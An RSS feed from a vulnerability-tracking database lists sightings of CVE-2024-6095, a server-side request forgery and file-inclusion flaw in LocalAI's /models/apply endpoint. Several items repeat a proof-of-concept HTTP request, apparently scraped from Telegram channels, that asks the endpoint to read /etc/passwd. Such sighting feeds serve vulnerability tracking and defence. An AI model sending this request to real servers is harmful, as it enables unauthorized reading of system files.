<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
  <channel>
    <title>Most recent sightings.</title>
    <link>https://db.gcve.eu</link>
    <description>Contains only the most 10 recent sightings.</description>
    <docs>http://www.rssboard.org/rss-specification</docs>
    <generator>python-feedgen</generator>
    <language>en</language>
    <lastBuildDate>Fri, 01 May 2026 15:22:26 +0000</lastBuildDate>
    <item>
      <title>e05366c2-898d-4b1d-9161-a3326aaad784</title>
      <link>https://db.gcve.eu/sighting/e05366c2-898d-4b1d-9161-a3326aaad784/export</link>
      <description>{"uuid": "e05366c2-898d-4b1d-9161-a3326aaad784", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "seen", "source": "https://t.me/cvedetector/152", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-6095 - A vulnerability in the /models/apply endpoint of m\", \n  \"Content\": \"CVE ID : CVE-2024-6095 \nPublished : July 6, 2024, 6:15 p.m. | 22\u00a0minutes ago \nDescription : A vulnerability in the /models/apply endpoint of mudler/localai versions 2.15.0 allows for Server-Side Request Forgery (SSRF) and partial Local File Inclusion (LFI). The endpoint supports both http(s):// and file:// schemes, where the latter can lead to LFI. However, the output is limited due to the length of the error message. This vulnerability can be exploited by an attacker with network access to the LocalAI instance, potentially allowing unauthorized access to internal HTTP(s) servers and partial reading of local files. The issue is fixed in version 2.17. \nSeverity: 5.8 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"06 Jul 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-07-06T20:41:09.000000Z"}</description>
      <content:encoded>{"uuid": "e05366c2-898d-4b1d-9161-a3326aaad784", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "seen", "source": "https://t.me/cvedetector/152", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-6095 - A vulnerability in the /models/apply endpoint of m\", \n  \"Content\": \"CVE ID : CVE-2024-6095 \nPublished : July 6, 2024, 6:15 p.m. | 22\u00a0minutes ago \nDescription : A vulnerability in the /models/apply endpoint of mudler/localai versions 2.15.0 allows for Server-Side Request Forgery (SSRF) and partial Local File Inclusion (LFI). The endpoint supports both http(s):// and file:// schemes, where the latter can lead to LFI. However, the output is limited due to the length of the error message. This vulnerability can be exploited by an attacker with network access to the LocalAI instance, potentially allowing unauthorized access to internal HTTP(s) servers and partial reading of local files. The issue is fixed in version 2.17. \nSeverity: 5.8 | MEDIUM \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"06 Jul 2024\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2024-07-06T20:41:09.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/e05366c2-898d-4b1d-9161-a3326aaad784/export</guid>
      <pubDate>Sat, 06 Jul 2024 20:41:09 +0000</pubDate>
    </item>
    <item>
      <title>dd7f40db-30f2-48d9-a6ef-9710ea9fe6f9</title>
      <link>https://db.gcve.eu/sighting/dd7f40db-30f2-48d9-a6ef-9710ea9fe6f9/export</link>
      <description>{"uuid": "dd7f40db-30f2-48d9-a6ef-9710ea9fe6f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/1868", "content": "CVE-2024-6095\n\nPOST /models/apply HTTP/1.1\n Host: 127.0.0.1\n Content-Type: application/json\n\n {\"url\":\"file:///etc/passwd\"}\n\n#exploit #poc", "creation_timestamp": "2024-08-30T08:38:48.000000Z"}</description>
      <content:encoded>{"uuid": "dd7f40db-30f2-48d9-a6ef-9710ea9fe6f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/1868", "content": "CVE-2024-6095\n\nPOST /models/apply HTTP/1.1\n Host: 127.0.0.1\n Content-Type: application/json\n\n {\"url\":\"file:///etc/passwd\"}\n\n#exploit #poc", "creation_timestamp": "2024-08-30T08:38:48.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/dd7f40db-30f2-48d9-a6ef-9710ea9fe6f9/export</guid>
      <pubDate>Fri, 30 Aug 2024 08:38:48 +0000</pubDate>
    </item>
    <item>
      <title>6ff83a1f-b04f-4c2d-9ca5-f16f45567f94</title>
      <link>https://db.gcve.eu/sighting/6ff83a1f-b04f-4c2d-9ca5-f16f45567f94/export</link>
      <description>{"uuid": "6ff83a1f-b04f-4c2d-9ca5-f16f45567f94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "published-proof-of-concept", "source": "Telegram/sE-LFBykdILB5V7LepgUFtQYsi484fAF7CX1rAUmm_ATlsU", "content": "", "creation_timestamp": "2024-08-30T08:38:49.000000Z"}</description>
      <content:encoded>{"uuid": "6ff83a1f-b04f-4c2d-9ca5-f16f45567f94", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "published-proof-of-concept", "source": "Telegram/sE-LFBykdILB5V7LepgUFtQYsi484fAF7CX1rAUmm_ATlsU", "content": "", "creation_timestamp": "2024-08-30T08:38:49.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/6ff83a1f-b04f-4c2d-9ca5-f16f45567f94/export</guid>
      <pubDate>Fri, 30 Aug 2024 08:38:49 +0000</pubDate>
    </item>
    <item>
      <title>a6e24a51-d577-4138-a37d-ff2c7481e7cf</title>
      <link>https://db.gcve.eu/sighting/a6e24a51-d577-4138-a37d-ff2c7481e7cf/export</link>
      <description>{"uuid": "a6e24a51-d577-4138-a37d-ff2c7481e7cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "published-proof-of-concept", "source": "Telegram/gExMF3sHIW8CrL_a-38ogXkaozkkP9VqJlzooQMuhYzpzQ", "content": "", "creation_timestamp": "2024-08-30T08:39:42.000000Z"}</description>
      <content:encoded>{"uuid": "a6e24a51-d577-4138-a37d-ff2c7481e7cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "published-proof-of-concept", "source": "Telegram/gExMF3sHIW8CrL_a-38ogXkaozkkP9VqJlzooQMuhYzpzQ", "content": "", "creation_timestamp": "2024-08-30T08:39:42.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/a6e24a51-d577-4138-a37d-ff2c7481e7cf/export</guid>
      <pubDate>Fri, 30 Aug 2024 08:39:42 +0000</pubDate>
    </item>
    <item>
      <title>7f0280b5-31c3-48c9-bf30-ebeff85666ff</title>
      <link>https://db.gcve.eu/sighting/7f0280b5-31c3-48c9-bf30-ebeff85666ff/export</link>
      <description>{"uuid": "7f0280b5-31c3-48c9-bf30-ebeff85666ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/18150", "content": "CVE-2024-6095\n\nPOST /models/apply HTTP/1.1\n Host: 127.0.0.1\n Content-Type: application/json\n\n {\"url\":\"file:///etc/passwd\"}\n\n#exploit #poc", "creation_timestamp": "2024-08-30T16:48:20.000000Z"}</description>
      <content:encoded>{"uuid": "7f0280b5-31c3-48c9-bf30-ebeff85666ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/18150", "content": "CVE-2024-6095\n\nPOST /models/apply HTTP/1.1\n Host: 127.0.0.1\n Content-Type: application/json\n\n {\"url\":\"file:///etc/passwd\"}\n\n#exploit #poc", "creation_timestamp": "2024-08-30T16:48:20.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/7f0280b5-31c3-48c9-bf30-ebeff85666ff/export</guid>
      <pubDate>Fri, 30 Aug 2024 16:48:20 +0000</pubDate>
    </item>
    <item>
      <title>c5361875-7b8d-4ee4-a8b6-fb2195f302fa</title>
      <link>https://db.gcve.eu/sighting/c5361875-7b8d-4ee4-a8b6-fb2195f302fa/export</link>
      <description>{"uuid": "c5361875-7b8d-4ee4-a8b6-fb2195f302fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/3088", "content": "CVE-2024-6095\n\nPOST /models/apply HTTP/1.1\n Host: 127.0.0.1\n Content-Type: application/json\n\n {\"url\":\"file:///etc/passwd\"}\n\n#exploit #poc", "creation_timestamp": "2024-08-31T07:50:44.000000Z"}</description>
      <content:encoded>{"uuid": "c5361875-7b8d-4ee4-a8b6-fb2195f302fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/3088", "content": "CVE-2024-6095\n\nPOST /models/apply HTTP/1.1\n Host: 127.0.0.1\n Content-Type: application/json\n\n {\"url\":\"file:///etc/passwd\"}\n\n#exploit #poc", "creation_timestamp": "2024-08-31T07:50:44.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/c5361875-7b8d-4ee4-a8b6-fb2195f302fa/export</guid>
      <pubDate>Sat, 31 Aug 2024 07:50:44 +0000</pubDate>
    </item>
    <item>
      <title>265db545-c276-41c6-ba50-33e87a8e826d</title>
      <link>https://db.gcve.eu/sighting/265db545-c276-41c6-ba50-33e87a8e826d/export</link>
      <description>{"uuid": "265db545-c276-41c6-ba50-33e87a8e826d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/1884", "content": "CVE-2024-6095\n\nPOST /models/apply HTTP/1.1\n Host: 127.0.0.1\n Content-Type: application/json\n\n {\"url\":\"file:///etc/passwd\"}\n\n#exploit #poc", "creation_timestamp": "2024-09-01T00:52:55.000000Z"}</description>
      <content:encoded>{"uuid": "265db545-c276-41c6-ba50-33e87a8e826d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/1884", "content": "CVE-2024-6095\n\nPOST /models/apply HTTP/1.1\n Host: 127.0.0.1\n Content-Type: application/json\n\n {\"url\":\"file:///etc/passwd\"}\n\n#exploit #poc", "creation_timestamp": "2024-09-01T00:52:55.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/265db545-c276-41c6-ba50-33e87a8e826d/export</guid>
      <pubDate>Sun, 01 Sep 2024 00:52:55 +0000</pubDate>
    </item>
    <item>
      <title>a682d6c7-cff8-4492-924a-f57b65b0379e</title>
      <link>https://db.gcve.eu/sighting/a682d6c7-cff8-4492-924a-f57b65b0379e/export</link>
      <description>{"uuid": "a682d6c7-cff8-4492-924a-f57b65b0379e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "published-proof-of-concept", "source": "https://t.me/fattahh_ir/2727", "content": "CVE-2024-6095\n\nPOST /models/apply HTTP/1.1\n Host: 127.0.0.1\n Content-Type: application/json\n\n {\"url\":\"file:///etc/passwd\"}\n\n#exploit #poc", "creation_timestamp": "2024-09-01T10:34:35.000000Z"}</description>
      <content:encoded>{"uuid": "a682d6c7-cff8-4492-924a-f57b65b0379e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "published-proof-of-concept", "source": "https://t.me/fattahh_ir/2727", "content": "CVE-2024-6095\n\nPOST /models/apply HTTP/1.1\n Host: 127.0.0.1\n Content-Type: application/json\n\n {\"url\":\"file:///etc/passwd\"}\n\n#exploit #poc", "creation_timestamp": "2024-09-01T10:34:35.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/a682d6c7-cff8-4492-924a-f57b65b0379e/export</guid>
      <pubDate>Sun, 01 Sep 2024 10:34:35 +0000</pubDate>
    </item>
    <item>
      <title>6068f315-6634-4706-846d-d37b2c4a12cd</title>
      <link>https://db.gcve.eu/sighting/6068f315-6634-4706-846d-d37b2c4a12cd/export</link>
      <description>{"uuid": "6068f315-6634-4706-846d-d37b2c4a12cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/18317", "content": "CVE-2024-6095\n\nPOST /models/apply HTTP/1.1\n Host: 127.0.0.1\n Content-Type: application/json\n\n {\"url\":\"file:///etc/passwd\"}\n\n#exploit #poc", "creation_timestamp": "2024-09-01T16:43:26.000000Z"}</description>
      <content:encoded>{"uuid": "6068f315-6634-4706-846d-d37b2c4a12cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-6095", "type": "published-proof-of-concept", "source": "https://t.me/realLulzSec/18317", "content": "CVE-2024-6095\n\nPOST /models/apply HTTP/1.1\n Host: 127.0.0.1\n Content-Type: application/json\n\n {\"url\":\"file:///etc/passwd\"}\n\n#exploit #poc", "creation_timestamp": "2024-09-01T16:43:26.000000Z"}</content:encoded>
      <guid isPermaLink="false">https://db.gcve.eu/sighting/6068f315-6634-4706-846d-d37b2c4a12cd/export</guid>
      <pubDate>Sun, 01 Sep 2024 16:43:26 +0000</pubDate>
    </item>
  </channel>
</rss>
